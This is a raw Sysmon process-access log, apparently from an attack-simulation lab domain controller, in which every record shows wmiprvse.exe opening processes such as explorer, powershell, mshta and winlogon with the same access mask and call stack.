15:59:22.038{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3F06-00000000A301}4668C:\Windows\SysWOW64\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024018Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.038{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024017Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.038{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024016Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.038{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024015Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.038{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024014Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.038{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024013Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.038{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024012Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.038{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024011Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.038{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024010Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.038{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024009Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.038{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024008Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.038{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024007Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.023{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024006Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.023{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024005Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.023{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024004Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.023{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024003Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.023{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024002Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.023{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024001Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.023{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024000Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.023{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023999Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 